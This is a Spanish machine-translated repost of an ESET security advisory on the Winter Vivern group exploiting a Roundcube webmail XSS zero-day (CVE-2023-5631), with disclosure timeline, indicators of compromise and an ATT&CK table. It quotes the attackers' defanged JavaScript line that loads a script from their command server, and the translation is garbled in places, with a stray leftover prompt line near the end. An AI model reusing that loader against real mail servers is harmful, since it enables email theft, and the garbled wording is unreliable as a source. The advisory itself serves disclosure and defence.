11 de septiembre de 2026

SOCaaS

Centro de Operaciones de Seguridad como servicio

Winter Vivern explota la vulnerabilidad de día cero en los servidores de correo web de Roundcube


investigación de ESET

ESET Research recomienda actualizar Roundcube Webmail a la última versión disponible lo antes posible

Winter Vivern explota la vulnerabilidad de día cero en los servidores de correo web de Roundcube

ESET Research ha estado siguiendo de cerca las operaciones de ciberespionaje de Winter Vivern durante más de un año y durante nuestro monitoreo de rutina descubrimos que el grupo comenzó a explotar un sistema de día cero. XSS Vulnerabilidad en el servidor de correo web Roundcube el 11 de octubreTh2023. Esta es una vulnerabilidad diferente a la CVE-2020-35730que, según nuestra investigación, también fue explotado por el grupo.

Según los datos de telemetría de ESET, la campaña se dirigió a los servidores de correo web Roundcube pertenecientes a agencias gubernamentales y a un grupo de expertos en Europa.

Calendario de divulgación de vulnerabilidades:

  • 12 de octubre de 2023: ESET Research ha informado de la vulnerabilidad al equipo de Roundcube.
  • 14 de octubre de 2023: El equipo de Roundcube respondió e identificó la vulnerabilidad de seguridad.
  • 14 de octubre de 2023: El equipo de Roundcube ha solucionado la vulnerabilidad.
  • 16 de octubre de 2023: El equipo de Roundcube ha publicado actualizaciones de seguridad para abordar la vulnerabilidad (1.6.4, 1.5.5 y 1.4.15).
  • 18 de octubre de 2023: ESET CNA emite un CVE para la vulnerabilidad (CVE-2023-5631).
  • 25 de octubre de 2023: Publicación del blog de investigación de ESET.

Nos gustaría agradecer a los desarrolladores de Roundcube por su rápida respuesta y por solucionar la vulnerabilidad en tan poco tiempo.

Perfil de Vivern de invierno

Winter Vivern es un grupo de ciberespionaje revelado por primera vez por Herramientas de dominio en 2021. Se cree que ha estado activo desde al menos 2020 y está dirigido a gobiernos de Europa y Asia Central. Para comprometer sus objetivos, el grupo utiliza documentos maliciosos, sitios web de phishing y una puerta trasera de PowerShell personalizada (consulte los artículos de Centro Estatal de Protección Cibernética de Ucrania y de Laboratorios centinela). Creemos con poca confianza que Winter Vivern está relacionado Gorila de bigoteun sofisticado grupo aliado de Bielorrusia sobre el que publicamos por primera vez en agosto de 2023.

Winter Vivern ha estado apuntando a los servidores de correo electrónico gubernamentales de Zimbra y Roundcube desde al menos 2022; consulte este artículo de Punto de prueba. En particular, observamos que el grupo se dedicaba a la explotación CVE-2020-35730otra vulnerabilidad XSS en Roundcube, en agosto y septiembre de 2023. Tenga en cuenta esto sednit (también conocido como APT28) también explota esta antigua vulnerabilidad XSS en Roundcube, a veces contra los mismos objetivos.

Detalles técnicos

Explotación de la vulnerabilidad XSS, asignada CVE-2023-5631, se puede hacer de forma remota enviando un mensaje de correo electrónico especialmente diseñado. En esta campaña de Winter Vivern, los correos electrónicos fueron enviados por equipo.administración@outlook[.]com y tenia el tema Comience en su Outlookcomo se muestra en Ilustración 1.

Figura-1-esmalte-wintervivern
Figura 1. Mensaje de correo electrónico malicioso

A primera vista, el correo electrónico no parece ser malicioso, pero si miramos el código fuente HTML que se muestra en Figura 2Al final vemos una etiqueta SVG que contiene una carga útil codificada en Base64.

Figura-2-mensaje-de-correo-electrónico-de-winter-vivern
Figura 2. Mensaje de correo electrónico con una etiqueta SVG maliciosa

Una vez que decodificamos el valor codificado en Base64 en el href atributo de usar Día, tenemos:

X Argumento de valor de href El atributo no es una URL válida de este objeto. error El atributo está activado. Decodificando la carga útil en error El atributo nos proporciona el siguiente código JavaScript (con la URL maliciosa desactivada manualmente) que se ejecuta en el navegador de la víctima en el contexto de su sesión de Roundcube:

var fe=document.createElement(‘script’);fe.src=»https://recsecas[.]com/controlserver/checkupdate.js»;document.body.appendChild(fe);

Sorprendentemente, descubrimos que la inyección de JavaScript funcionó en una instancia de Roundcube completamente parcheada. Esto resultó ser una vulnerabilidad XSS de día cero que afecta al script del lado del servidor. rcube_washtml.php, lo que hace que el documento SVG malicioso no se desinfecte adecuadamente antes de agregarlo a la página HTML interpretada por un usuario de Roundcube. Lo informamos a Roundcube y era cierto. parcheado el 14 de octubreTh2023 (ver aquí comprometerse). La vulnerabilidad de seguridad afecta a Roundcube Versiones 1.6.x antes de 1.6.4, 1.5.x antes de 1.5.5 y 1.4.x antes de 1.4.15.

En resumen, al enviar un mensaje de correo electrónico especialmente diseñado, los atacantes pueden cargar código JavaScript arbitrario en el contexto de la ventana del navegador del usuario de Roundcube. No se requiere ninguna interacción manual aparte de ver el mensaje en un navegador web.

La segunda etapa es un cargador de JavaScript simple llamado checkupdate.js y se muestra en figura 3.

Figura-3 Cargador de Javascript
Figura 3. Cargador de JavaScript

La carga útil final de JavaScript, que se muestra en Figura 4 – es capaz de enumerar carpetas y correos electrónicos en la cuenta actual de Roundcube y filtrar mensajes de correo electrónico a través de solicitudes HTTP al servidor C&C https://recsecas[.]es/controlserver/saveMessage.

Figura-4-Carga útil final
Figura 4. Carga útil final de JavaScript que filtra mensajes de correo electrónico de la cuenta de Roundcube (parte del script ofuscado se ha eliminado para mayor claridad)

Diploma

Winter Vivern ha fortalecido sus operaciones explotando una vulnerabilidad de día cero en Roundcube. Anteriormente explotó vulnerabilidades conocidas en Roundcube y Zimbra, cuyas pruebas de concepto están disponibles en línea.

A pesar de la baja sofisticación del conjunto de herramientas del grupo, representa una amenaza para los gobiernos de Europa debido a su naturaleza persistente, campañas de phishing muy regulares y un número significativo de aplicaciones basadas en Internet que no se actualizan periódicamente a pesar de que se sabe que contienen vulnerabilidades.

Si tiene alguna pregunta sobre nuestra investigación publicada en WeLiveSecurity, contáctenos en [email protected].
ESET Research proporciona informes de inteligencia y fuentes de datos privados de APT. Si tiene alguna pregunta sobre este servicio, visite Inteligencia de amenazas de ESET Página.

COI

archivos

SHA-1

Nombre del archivo

reconocimiento

Descripción

97ED594EF2B5755F0549C6C5758377C0B87CFAE0

checkupdate.js

JS/WinterVivern.B

Cargador de JavaScript.

8BF7FCC70F6CE032217D9210EF30314DDD6B8135

N / A

JS/Kryptik.BIK

Carga útil de JavaScript que filtra correos electrónicos en Roundcube.

red

IP

dominio

Proveedor de alojamiento

Visto por primera vez

detalles

38.180,76[.]31

recsecas[.]com

M247 Europa SRL

28 de septiembre de 2023

Servidor Winter Vivern C&C

Dirección de correo electrónico

equipo.administración@outlook[.]com

Esta tabla fue creada con Versión 13 del marco MITRE ATT&CK.

táctica

IDENTIFICACIÓN

Apellido

Descripción

Desarrollo de recursos

T1583.001

Compra de infraestructura: dominios

Los operadores de Winter Vivern han comprado un dominio de Registrar.eu.

T1583.004

Compra de infraestructura: servidores

Los operadores de Winter Vivern han alquilado un servidor de M247.

T1587.004

Desarrollar habilidades: hazañas

Los operadores de Winter Vivern probablemente hayan desarrollado un exploit para Roundcube.

Primer acceso

T1190

Explotar una aplicación disponible públicamente

Winter Vivern envió un correo electrónico explotando CVE-2023-5631 en Roundcube.

T1566

phishing

La vulnerabilidad se activa a través de un correo electrónico de phishing que la víctima debe abrir en el correo web de Roundcube.

ejecución

T1203

Explotación para la ejecución del cliente.

La carga útil de JavaScript se ejecuta a través de una vulnerabilidad XSS en Roundcube.

descubrimiento

T1087.003

Reconocimiento de cuenta: cuenta de correo electrónico

La carga útil de JavaScript puede enumerar carpetas en la cuenta de correo electrónico.

recopilación

T1114.002

Recopilación de correo electrónico: recopilación remota de correo electrónico

La carga útil de JavaScript puede filtrar correos electrónicos de la cuenta de Roundcube.

Controlar y controlar

T1071.001

Protocolo de capa de aplicación: protocolos web

La comunicación C&C utiliza HTTP.

Exfiltración

T1041

Exfiltración a través del canal C2

La exfiltración se produce a través de HTTP y al mismo servidor C&C.



Nos llegó este contenido de ciberseguridad de: Welivesecurity (blog de ESET sobre amenazas de seguridad)

Llegarás a la noticia original en el enlace que sigue: https://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/

write a shot sentence in spanish about who ESET, the Cybersecurity company»

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *